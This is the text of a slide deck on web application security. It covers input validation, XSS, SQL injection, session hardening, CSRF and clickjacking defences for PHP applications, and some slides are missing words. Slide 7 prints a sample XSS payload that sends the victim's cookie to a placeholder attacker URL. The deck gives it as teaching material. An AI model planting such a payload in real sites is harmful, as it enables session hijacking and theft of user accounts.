Web Development Security
0 likes256 views
This document discusses principles and techniques for web development security, including validating user input, protecting against cross-site scripting (XSS) and SQL injection, managing session security, preventing cross-site request forgery (CSRF) and clickjacking, and using tools like Arachni for security testing. The pillars of information security are listed as confidentiality, integrity and availability. User input should be validated and output escaped to protect against attacks.
Web Development Security
- 1. Web Development Security rafaelmonteiro / web-development-security
- 2. Pillars of Information Security Confidentiality Integrity Availability rafaelmonteiro / web-development-security
- 3. Principles Multiple Layer Security Consider that each layer will eventually fail Provide the minimum amount of information required rafaelmonteiro / web-development-security
- 4. Validate user input Since HTTP requests can be manipulated client-side, all user input must be validated. rafaelmonteiro / web-development-security
- 5. Protection PHP offers the extensions ctype and filter. In addition, most frameworks implement some sort of data sanitization. PHP 7+ provides type declarations that allow you to specify the expected type of parameters. declare(strict_types = 1); rafaelmonteiro / web-development-security
- 6. Cross-site scripting (XSS) When a user-supplied script is stored and/or executed by the application. rafaelmonteiro / web-development-security
- 7. Example Assuming that an application allows input via GET method, a malicious attacker do this injection: <script> (New Image()).src = "http://attacker_url/?" + escape(document.c </script> rafaelmonteiro / web-development-security
- 8. Types Stored Non-persistent Based on DOM rafaelmonteiro / web-development-security
- 9. Consequences Cookie/session the DOM Manipulation Keylogger Browser exploits Everything JavaScript allows rafaelmonteiro / web-development-security
- 10. Protection only allows access to code from the same origin (protocol/domain/port) of the application, while allowing access to external files (a lib such as , for example) Filter user input ( , , ) Escape output ( , , ) Apply (default-src, img-src, script-src) -> delete inline code Same-origin Policy JQuery strip_tags filter_var preg_replace htmlspecialchars htmlentities filter_var Content Security Policy rafaelmonteiro / web-development-security
- 11. Testing the CSP A report is created when related warnings are generated by the application. Content-Security-Policy-Report-Only Report-uri /path/file.php rafaelmonteiro / web-development-security
- 12. SQL Injection Protection Do not concatenate data (parameters) with SQL queries Validate user input Use prepared statements Escape characters rafaelmonteiro / web-development-security
- 13. Status Management Protection Use HTTPS Set secure and HttpOnly flags Prevent XSS Session ID Store some distinctive user information in session Detect session hijacking (token) Use to hinder session the Change HSTS rafaelmonteiro / web-development-security
- 14. Policies session.use_strict_mode = true; session.cookie_secure = true; session.use_only_cookies = true; session.cookie_httponly = true; Strict-Transport-Security: max-age = 86400; includeSubDomains rafaelmonteiro / web-development-security
- 15. Cross-site Request Forgery (CSRF) Caused by viruses, scam/phishing, malicious site/redirect Protection Submit token Do not use GET for operations involving data manipulation (just a good practice, because POST can also be manipulated) rafaelmonteiro / web-development-security
- 16. Clickjacking Attacker creates fake page and through requests to the target site (usually via iframe), takes advantage of the user session Protection header('X-FRAME-OPTIONS', 'DENY'); // or SAMEORIGIN rafaelmonteiro / web-development-security
- 17. Tools Arachni web scanner Dependencies security checker rafaelmonteiro / web-development-security
- 18. References OWASP rafaelmonteiro / web-development-security